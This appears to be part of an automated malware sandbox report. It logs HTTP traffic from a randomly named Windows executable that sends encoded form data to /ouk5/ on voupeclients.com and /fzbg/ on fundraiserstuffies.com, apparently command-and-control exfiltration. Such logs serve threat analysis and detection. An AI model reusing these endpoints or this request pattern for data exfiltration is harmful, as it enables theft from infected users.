                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Raw: 76 58 3d 43 4a 2b 31 53 55 75 4d 34 50 50 4d 61 59 35 46 38 49 74 53 56 75 36 4e 6d 54 33 73 35 38 5a 76 39 6a 69 56 46 5a 68 61 71 75 4b 64 36 4b 4d 47 67 68 54 32 70 45 2b 57 4e 45 51 30 47 76 55 4f 41 4a 31 79 33 6f 70 68 45 31 42 2f 4f 44 6a 2f 72 2f 6b 37 4a 38 41 6d 6c 53 32 31 5a 6a 57 72 52 42 4a 35 63 42 49 38 4c 2f 47 57 77 42 59 67 61 79 55 58 41 47 76 6e 6c 42 4e 6a 51 45 37 4b 59 32 2b 4c 63 6b 36 67 47 75 51 2b 61 41 32 2f 66 70 34 49 41 72 4e 79 78 35 6a 4d 6d 4a 7a 33 71 43 6f 5a 43 6a 61 4b 51 7a 54 59 55 55 74 55 42 38 74 32 73 71 72 62 6e 59 4a 69 65 62 32 35 72 41 3d 3d
                                                            Data Ascii: vX=CJ+1SUuM4PPMaY5F8ItSVu6NmT3s58Zv9jiVFZhaquKd6KMGghT2pE+WNEQ0GvUOAJ1y3ophE1B/ODj/r/k7J8AmlS21ZjWrRBJ5cBI8L/GWwBYgayUXAGvnlBNjQE7KY2+Lck6gGuQ+aA2/fp4IArNyx5jMmJz3qCoZCjaKQzTYUUtUB8t2sqrbnYJieb25rA==
                                                            Jul 3, 2024 17:38:41.779546022 CEST385INHTTP/1.1 301 Moved Permanently
                                                            Server: openresty
                                                            Date: Wed, 03 Jul 2024 15:38:41 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 166
                                                            Connection: close
                                                            Location: http://voupeclients.com
                                                            X-Frame-Options: sameorigin
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            34192.168.11.204980844.227.65.245807100C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:38:44.325926065 CEST1134OUTPOST /ouk5/ HTTP/1.1
                                                            Host: www.voupeclients.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.voupeclients.com
                                                            Referer: http://www.voupeclients.com/ouk5/
                                                            Content-Length: 539
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Raw: 76 58 3d 43 4a 2b 31 53 55 75 4d 34 50 50 4d 61 34 70 46 36 76 42 53 64 75 36 4d 6f 7a 33 73 73 73 5a 6a 39 6a 6d 56 46 63 5a 4b 71 37 61 64 36 72 38 47 79 77 54 32 6c 6b 2b 57 48 6b 51 37 62 66 55 46 41 4a 78 4d 33 6f 56 68 45 31 39 2f 50 79 44 2f 74 50 6b 34 47 63 42 55 69 53 32 30 54 44 57 68 52 41 31 74 63 44 30 38 49 4f 71 57 7a 41 30 67 4e 57 41 55 4b 47 76 68 31 78 4e 67 61 6b 37 2b 59 32 69 35 63 6c 43 61 47 64 4d 2b 5a 68 57 2f 65 70 34 50 53 37 4e 35 7a 35 69 7a 68 62 4f 69 70 77 68 75 4f 55 6d 32 4b 57 44 5a 52 6c 56 35 45 75 6c 4a 73 6f 44 71 6f 62 55 65 61 35 62 4b 30 42 6b 64 4a 35 2b 72 57 42 51 46 66 2f 38 73 78 63 78 6e 56 65 49 6a 66 48 36 6b 53 75 61 35 49 32 69 69 44 47 65 53 4c 6c 6a 75 75 43 48 79 45 51 5a 4c 76 53 36 67 39 6b 6b 47 73 49 53 77 76 57 77 39 52 37 4a 62 34 4a 75 69 42 41 71 51 58 31 6c 71 50 79 64 6c 38 6d 4c 63 50 46 57 70 37 7a 76 6a 75 53 4d 57 4b 52 42 53 32 2b 43 30 36 51 74 6a 39 59 5a 52 76 72 38 32 58 62 50 53 31 53 2b 58 4c 4e 33 30 55 59 4b 61 6b 41 48 [TRUNCATED]
                                                            Data Ascii: vX=CJ+1SUuM4PPMa4pF6vBSdu6Moz3sssZj9jmVFcZKq7ad6r8GywT2lk+WHkQ7bfUFAJxM3oVhE19/PyD/tPk4GcBUiS20TDWhRA1tcD08IOqWzA0gNWAUKGvh1xNgak7+Y2i5clCaGdM+ZhW/ep4PS7N5z5izhbOipwhuOUm2KWDZRlV5EulJsoDqobUea5bK0BkdJ5+rWBQFf/8sxcxnVeIjfH6kSua5I2iiDGeSLljuuCHyEQZLvS6g9kkGsISwvWw9R7Jb4JuiBAqQX1lqPydl8mLcPFWp7zvjuSMWKRBS2+C06Qtj9YZRvr82XbPS1S+XLN30UYKakAHH109n5mCuhD3aPzpSJVu061OZI+A2QpBl//VWBRz3KmtqABUxWOUc+P7c41ZjxDHejtg7XyvKab6D9CijJEVWg48W/ap15U/O3iNW7Y8laRKg7ltdfTWF/BWcgkW/ELfVYT14Etjj7/XVYZBSebDoXaVxSLAC3Sz2HiYmjUTJyw5m6c8hYIaH67T9PAAhoT/qSyQIVE8=
                                                            Jul 3, 2024 17:38:44.508347034 CEST385INHTTP/1.1 301 Moved Permanently
                                                            Server: openresty
                                                            Date: Wed, 03 Jul 2024 15:38:44 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 166
                                                            Connection: close
                                                            Location: http://voupeclients.com
                                                            X-Frame-Options: sameorigin
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            35192.168.11.204980944.227.65.245807100C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:38:47.061451912 CEST2578OUTPOST /ouk5/ HTTP/1.1
                                                            Host: www.voupeclients.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.voupeclients.com
                                                            Referer: http://www.voupeclients.com/ouk5/
                                                            Content-Length: 52927
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Raw: 76 58 3d 43 4a 2b 31 53 55 75 4d 34 50 50 4d 61 34 70 46 36 76 42 53 64 75 36 4d 6f 7a 33 73 73 73 5a 6a 39 6a 6d 56 46 63 5a 4b 71 34 36 64 36 64 6f 47 67 44 4c 32 6b 6b 2b 57 5a 30 51 72 62 66 55 69 41 49 56 49 33 6f 59 55 45 77 35 2f 50 6a 54 2f 74 39 63 34 57 4d 41 7a 74 79 32 36 5a 6a 58 6f 52 42 4a 48 63 44 67 47 4c 2b 75 57 77 44 41 67 61 55 6f 58 47 32 76 6e 31 78 4e 38 65 6b 37 32 59 32 6d 70 63 6b 2b 61 47 66 34 2b 49 44 75 2f 64 36 67 50 56 72 4e 2b 6b 70 69 38 72 37 4f 70 70 77 45 66 4f 55 6d 4d 4b 54 37 5a 52 6e 64 35 48 74 64 4b 73 49 44 71 72 62 55 64 4c 70 58 4f 30 42 34 56 4a 34 36 72 57 44 41 46 5a 76 38 73 33 35 52 67 63 65 49 68 55 6e 36 7a 46 2b 57 68 49 32 47 51 44 48 71 53 4b 52 44 75 75 7a 48 79 4c 55 4e 4c 7a 43 36 2b 35 6b 6b 4f 6c 6f 54 7a 76 51 52 75 52 36 6f 75 34 4a 4b 69 4f 45 79 51 54 55 6c 70 5a 43 63 50 69 32 4b 45 65 56 4b 6c 37 7a 2f 2f 75 53 4d 47 4b 56 5a 53 32 76 79 30 31 78 74 67 36 49 59 5a 70 72 38 76 64 37 44 69 31 53 79 50 4c 4f 6e 6b 55 65 71 61 32 77 48 [TRUNCATED]
                                                            Data Ascii: vX=CJ+1SUuM4PPMa4pF6vBSdu6Moz3sssZj9jmVFcZKq46d6doGgDL2kk+WZ0QrbfUiAIVI3oYUEw5/PjT/t9c4WMAzty26ZjXoRBJHcDgGL+uWwDAgaUoXG2vn1xN8ek72Y2mpck+aGf4+IDu/d6gPVrN+kpi8r7OppwEfOUmMKT7ZRnd5HtdKsIDqrbUdLpXO0B4VJ46rWDAFZv8s35RgceIhUn6zF+WhI2GQDHqSKRDuuzHyLUNLzC6+5kkOloTzvQRuR6ou4JKiOEyQTUlpZCcPi2KEeVKl7z//uSMGKVZS2vy01xtg6IYZpr8vd7Di1SyPLOnkUeqa2wHHj3VmumC1pj2FSDpBJViG6wuJIPs2QY9l7vVZExzzEGsjEBUxWOR7+OHc5Fhjwxfeoa07ECvMab7d9CnTJH14g5N5/cR14AzOwnxVt488NhKNmVxOfTKd/FymhWS/W7vVOj15PtjksPXHcZMTebvWXZJhSL4C1WKuUBgZ30Tx7xVq+e1xeJb/x6DRI3w3pEHlBhU7EwfFqiH+E/q/qiIdqXkZHNzVKMU6s8ihI4V6WR3KELsUASOKtu+VL1PH0/Pbemu1t0twVshUql4RGpidMfFE2OWPyHMcxpIUMETcfDnnqfb87yjVlH4UxBnb9b5tFvpWb2ImEfG1gVbGRYLbBc165r3ujbLKZAcRCFK2V3a7dW1SEdN16Fyyk2LKRzE1St5rJgnmwDV9Ss0lUE6/4EMqs0OtoBk+p12VvlfV2BC6LJVUV4L6LlZi2zazHMJUtWYPHA4wSsb/0qc3ODrvj5qEd97EpL4Q+JFrOAsWxDGgMzzOMwKcxwm7ZjDXhKWnFWSjAPDle/1FatfQvfNpU6/VF4T3m96u9iMJIqHIbzrVEv/iBKjkuNL32v1IJAuEhbr33l0Dmv0xLTvhQYbhW2dcxQkXJczXcHciwXYDPWvik/s4YPXpANSPtoC9R6y+XWmDo8SFWaOAs1kcGiYSV4fil1PfkcuRT [TRUNCATED]
                                                            Jul 3, 2024 17:38:47.061474085 CEST5156OUTData Raw: 66 7a 62 30 51 69 62 6a 77 39 74 41 65 66 6a 34 6c 53 62 39 66 44 38 6e 68 6b 65 59 55 48 45 39 62 61 61 4b 32 71 72 33 67 2b 34 71 75 55 38 48 65 71 77 48 52 45 62 57 32 48 71 6b 6c 41 50 72 2b 56 51 47 61 78 48 59 66 70 79 7a 2b 6d 37 79 79 70
                                                            Data Ascii: fzb0Qibjw9tAefj4lSb9fD8nhkeYUHE9baaK2qr3g+4quU8HeqwHREbW2HqklAPr+VQGaxHYfpyz+m7yypk+sb1eOJRrZjqrzk3Koqd7E/CBmWCduf3lPy0hqs4eHA7qEXHaqkistqL45wFYMnxMY4h1cPMNjq29KCMnZE1TwvKcO3KU7OarW0pNzr45yTBbv3G+aBtOsPAq+tkN1MQ0ApQG2szp5OBg2W8S8Z7W4nWuFRZMky1
                                                            Jul 3, 2024 17:38:47.061520100 CEST5156OUTData Raw: 4f 56 56 49 46 6c 73 55 54 6e 4e 2f 55 56 53 49 62 64 58 52 6a 41 64 54 6a 6f 57 74 56 67 4e 71 50 63 4b 6a 6d 4e 64 51 58 4c 35 71 6c 5a 48 79 50 51 4a 79 52 67 63 2f 39 56 56 37 30 38 2b 50 71 54 57 77 56 35 30 70 2b 4d 38 4a 62 43 6e 33 2f 45
                                                            Data Ascii: OVVIFlsUTnN/UVSIbdXRjAdTjoWtVgNqPcKjmNdQXL5qlZHyPQJyRgc/9VV708+PqTWwV50p+M8JbCn3/EXQ8+aRnzjcvixvFGDqQavNJowKanpteJDDp/y3MVl2wlyphdjJ6cRpCifx7WZMe7qTtx2tqURwwV0mtUrulJap5YzyC2AbS10YBhxmz+2b3M22HfXE9mPDA6r0JHgCbwv+bzIZCGYCmYw5pS0BiR7RnjaM2ZG/rPR
                                                            Jul 3, 2024 17:38:47.239252090 CEST1289OUTData Raw: 66 4e 37 76 67 6b 6c 6f 68 62 38 45 73 4a 6b 33 36 42 72 76 68 41 6c 61 51 55 59 72 42 6f 31 4e 33 65 32 4b 44 4e 34 42 75 6d 4f 4c 43 69 6a 78 6d 51 69 52 73 7a 4e 54 70 2f 6d 78 77 53 73 58 74 57 46 46 41 4c 49 43 6a 65 39 42 50 70 7a 58 48 39
                                                            Data Ascii: fN7vgklohb8EsJk36BrvhAlaQUYrBo1N3e2KDN4BumOLCijxmQiRszNTp/mxwSsXtWFFALICje9BPpzXH9V5vilfMpVQ5yNODhBj+YMiHQv2ymIbJ+fqqivd04jSH0eqZ3MrRgmH2P6OP1wCYSV6jyyjg186sTVdTx2zqtM9nSAKXoCOmdxbGasMpGokBwYS6W3/imP1Qb76N4ZAxJTMXwQJjtfgUxvcD46UOtFT1d+jvtvNx8g
                                                            Jul 3, 2024 17:38:47.239456892 CEST11601OUTData Raw: 7a 71 38 4e 77 72 51 64 6d 65 50 46 4c 5a 49 5a 31 79 42 66 79 74 4a 32 41 76 39 74 56 61 4d 48 62 49 42 7a 6b 62 78 44 79 69 76 75 6f 31 79 65 4d 74 43 34 4b 37 75 72 30 78 45 30 59 68 34 30 49 4f 56 77 52 70 45 7a 4a 4a 51 4a 66 79 31 71 63 46
                                                            Data Ascii: zq8NwrQdmePFLZIZ1yBfytJ2Av9tVaMHbIBzkbxDyivuo1yeMtC4K7ur0xE0Yh40IOVwRpEzJJQJfy1qcFT+DJvIXJlOEcYTTmF0CAKXDFD518vw+5IHh6BIJLo2Ud7bkgmNiNhcn0inQu8FqRCdBnqvdf/lxkc+uAF3EzMfr0vGk+u9z4u1CYYuAiihZxjTRsgPc2ADkhQ7B77+KLpaSt3OIbdBKigBRer1q5NEkyg0GyspDd7
                                                            Jul 3, 2024 17:38:47.239589930 CEST1289OUTData Raw: 41 43 6a 61 4b 50 66 45 4b 69 61 73 70 50 39 53 31 4d 51 54 6e 6d 33 33 78 30 56 68 6e 6a 2b 42 4a 55 5a 31 70 4e 62 63 4b 78 61 51 4d 43 33 6e 37 41 57 65 70 79 65 4a 76 34 6c 34 61 45 63 4b 66 2f 4d 76 62 42 74 48 69 55 4d 73 54 32 51 34 37 53
                                                            Data Ascii: ACjaKPfEKiaspP9S1MQTnm33x0Vhnj+BJUZ1pNbcKxaQMC3n7AWepyeJv4l4aEcKf/MvbBtHiUMsT2Q47SslwUEevMqgn/eZsdN2wWeoI5apUEN3VD3GnNOVFnNQoyAGVgPi1keeoeiVStYhwiybT7BJFBybG89tH2iaZ4n3GWsAihtSGVfGrzh5Vt00Q9XaagLOpUs1B7Fi0GAvrgiUnvzKi7MtPH5EYW/NfBfc9qUwq/jfMgc
                                                            Jul 3, 2024 17:38:47.239762068 CEST11601OUTData Raw: 68 67 67 61 67 4b 59 65 30 54 45 50 2f 55 78 4f 2b 51 49 72 43 4b 35 48 70 68 6a 43 35 34 59 75 45 41 7a 39 66 72 74 75 63 53 4c 6c 6f 73 4a 69 54 41 37 77 4a 66 32 4d 76 53 45 49 49 61 6b 35 76 42 7a 4c 45 54 30 69 67 45 75 36 31 64 4a 4b 41 5a
                                                            Data Ascii: hggagKYe0TEP/UxO+QIrCK5HphjC54YuEAz9frtucSLlosJiTA7wJf2MvSEIIak5vBzLET0igEu61dJKAZ2QfGCsVAWsj4aYtBdbQnoKEttMZRfbV67/rBLR5uJI17NLsRwLzTsQpKuAKBBMyeqsxwRplT1AbJV0nQ19eRl0FUT8yfvFciPJz2Emh2FQr8dsdKkxHPJ06j45EuavzdiJiY7UFZ702zGGclxyo8XBhjK0VEQwxXo
                                                            Jul 3, 2024 17:38:47.243540049 CEST385INHTTP/1.1 301 Moved Permanently
                                                            Server: openresty
                                                            Date: Wed, 03 Jul 2024 15:38:47 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 166
                                                            Connection: close
                                                            Location: http://voupeclients.com
                                                            X-Frame-Options: sameorigin
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>
                                                            Jul 3, 2024 17:38:47.417387009 CEST2578OUTData Raw: 31 37 2b 38 42 78 37 79 59 6f 6e 35 30 2b 45 31 78 6e 48 39 6f 34 30 50 79 67 32 52 4b 45 43 51 54 48 74 76 46 32 34 6d 79 57 54 74 46 46 35 55 72 53 76 75 30 51 44 38 76 4f 62 78 41 57 30 38 50 46 73 56 77 59 44 67 68 73 77 64 54 71 47 36 34 53
                                                            Data Ascii: 17+8Bx7yYon50+E1xnH9o40Pyg2RKECQTHtvF24myWTtFF5UrSvu0QD8vObxAW08PFsVwYDghswdTqG64SR59A/W8Qx6KdYntXTIC/snoxXPa+l4Xi9dQqFki47JgVEMCpwp0VwNj+fCd3wKQ5zpd+RU5Z6FOyCpZEI8KoHWx4hxdUBkOImja63ry/NncdnQZ2//Qe1dW1lsnYQoS8xHvMQS/Q8tAy2hPNOcGYxmCSws8wVT2rk
                                                            Jul 3, 2024 17:38:47.417548895 CEST6445OUTData Raw: 76 68 43 77 63 30 35 38 54 35 53 2f 52 52 62 46 4d 34 36 6d 78 64 46 30 39 42 61 36 4a 6b 72 59 4a 31 72 33 44 5a 44 38 57 36 36 77 55 6e 62 73 62 71 6e 62 78 38 49 66 51 32 6c 34 52 6d 51 61 56 6b 61 47 73 58 35 68 71 64 6f 58 73 59 73 2b 7a 70
                                                            Data Ascii: vhCwc058T5S/RRbFM46mxdF09Ba6JkrYJ1r3DZD8W66wUnbsbqnbx8IfQ2l4RmQaVkaGsX5hqdoXsYs+zpn/6G+bWZcNFiYPXGQm3smocxvZJb0ac5pMjf4uLGfvGLdSJspA3jXEOjgLX3M83QjWF2GalTrX1PvXzaI6XTIbHgRkTKaYLJLjFmMF0afEMXI0rHw44m8WIizY+yuyu3W8FS4r3s7zPSzNbBQucMT4ss2wVIVSK+u
                                                            Jul 3, 2024 17:38:47.417742968 CEST5838OUTData Raw: 49 78 52 68 4f 46 77 61 39 41 56 32 36 45 4f 38 33 6c 5a 45 44 6a 43 39 6c 38 57 66 6d 4c 4d 59 76 50 6d 48 74 71 58 35 2f 6f 69 44 6f 59 55 58 46 41 33 74 6d 67 4b 55 4b 6a 79 7a 31 62 38 7a 56 72 5a 43 4c 4c 54 30 7a 30 77 47 6a 66 44 4a 74 4f
                                                            Data Ascii: IxRhOFwa9AV26EO83lZEDjC9l8WfmLMYvPmHtqX5/oiDoYUXFA3tmgKUKjyz1b8zVrZCLLT0z0wGjfDJtOy8/5ZAwNwgBSt9yKIQqOogk202kDp02RLA64tynstSbt6TSjWK2c7wUQxArNlT3/ZhfN2sr9lwb05vPPLp7lA2+AOWUJ6ohOs9+1rLrU+Ef1b/IrcDWJVP98xWP+lYfmfkqBewvnDfSnzYp3ewk0GyB6mF3N+Dnrt


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            36192.168.11.204981044.227.65.245807100C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:38:49.790857077 CEST524OUTGET /ouk5/?vX=PLWVRijYnvzxBPZV68lDWez5n1m4qNxygDOUEJJl7paGkoFy8irkxF+ePmZFSckDR+ltzcYQPDsLLRino9E0Pe5jqCKxYTXxZRA6KSseMdymxDABailrF38=&_B7=LxyxWrj8kri0gh HTTP/1.1
                                                            Host: www.voupeclients.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:38:49.972012997 CEST385INHTTP/1.1 301 Moved Permanently
                                                            Server: openresty
                                                            Date: Wed, 03 Jul 2024 15:38:49 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 166
                                                            Connection: close
                                                            Location: http://voupeclients.com
                                                            X-Frame-Options: sameorigin
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            37192.168.11.20498113.33.130.190807100C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:38:55.322060108 CEST812OUTPOST /fzbg/ HTTP/1.1
                                                            Host: www.fundraiserstuffies.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.fundraiserstuffies.com
                                                            Referer: http://www.fundraiserstuffies.com/fzbg/
                                                            Content-Length: 199
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Raw: 76 58 3d 6a 52 77 53 61 69 7a 58 52 43 56 45 79 46 4d 72 44 79 6b 42 2f 71 48 48 36 55 73 43 2b 30 6c 30 67 54 68 4b 35 7a 51 35 37 2b 39 7a 72 4c 2f 6b 61 6b 39 47 70 50 61 52 77 63 7a 7a 55 6c 78 44 37 57 59 65 4f 54 7a 6e 49 2b 45 30 53 55 55 75 63 31 44 6c 4b 41 52 4b 4c 62 32 6a 71 4e 52 67 67 73 6b 61 4c 63 2b 31 44 50 4e 69 68 65 71 44 78 39 2f 53 4c 6e 77 7a 32 44 61 43 59 6c 4f 52 63 4a 6e 4d 66 4f 45 63 76 59 4e 42 6c 30 42 48 33 58 72 4e 6a 76 43 70 7a 58 7a 32 50 71 2f 62 30 42 72 30 62 44 6b 34 2f 76 6b 69 2b 32 79 36 4a 46 37 33 61 31 32 6b 68 34 75 2b 4d 79 38 78 2f 67 3d 3d
                                                            Data Ascii: vX=jRwSaizXRCVEyFMrDykB/qHH6UsC+0l0gThK5zQ57+9zrL/kak9GpPaRwczzUlxD7WYeOTznI+E0SUUuc1DlKARKLb2jqNRggskaLc+1DPNiheqDx9/SLnwz2DaCYlORcJnMfOEcvYNBl0BH3XrNjvCpzXz2Pq/b0Br0bDk4/vki+2y6JF73a12kh4u+My8x/g==


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            38192.168.11.20498123.33.130.190807100C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:38:58.004158974 CEST1152OUTPOST /fzbg/ HTTP/1.1
                                                            Host: www.fundraiserstuffies.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.fundraiserstuffies.com
                                                            Referer: http://www.fundraiserstuffies.com/fzbg/
                                                            Content-Length: 539
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Raw: 76 58 3d 6a 52 77 53 61 69 7a 58 52 43 56 45 67 30 38 72 43 52 4d 42 72 36 48 45 6d 6b 73 43 33 55 6b 2f 67 54 74 4b 35 7a 34 70 37 4e 5a 7a 72 71 50 6b 62 6c 39 47 71 50 61 52 6f 73 79 35 4c 56 77 50 37 57 64 72 4f 52 33 6e 49 2b 67 30 64 47 4d 75 49 56 44 36 41 67 52 4a 4d 62 32 2b 75 4e 52 36 67 73 35 4a 4c 65 43 31 44 66 70 69 67 64 43 44 37 4d 2f 64 50 48 77 31 77 44 61 42 52 46 50 51 63 4a 72 79 66 4b 4a 68 76 4a 35 42 6c 58 35 48 30 58 72 4f 74 66 43 6b 75 48 7a 6d 41 4a 6d 53 33 44 66 42 59 68 6b 48 31 76 45 72 37 55 65 68 45 45 6d 56 49 33 66 61 69 4a 33 74 66 41 64 59 2f 7a 4f 7a 74 4a 39 57 6f 42 39 38 57 45 6b 37 33 44 4a 48 4e 58 6a 55 64 50 73 4f 70 66 49 35 2b 64 6a 6b 4c 55 4d 50 68 41 4e 46 43 44 43 66 78 6f 62 6c 32 62 46 35 59 78 47 62 43 73 57 66 6e 6b 77 68 42 2b 62 6f 4c 71 44 32 7a 47 45 35 4e 56 2f 33 6b 32 49 4b 59 35 39 55 44 48 63 54 4b 2b 44 77 67 79 47 44 37 54 45 57 59 5a 77 30 73 73 41 4a 78 7a 51 37 38 37 61 32 57 45 58 73 49 31 2b 70 6c 76 39 63 58 4b 79 4b 32 68 64 [TRUNCATED]
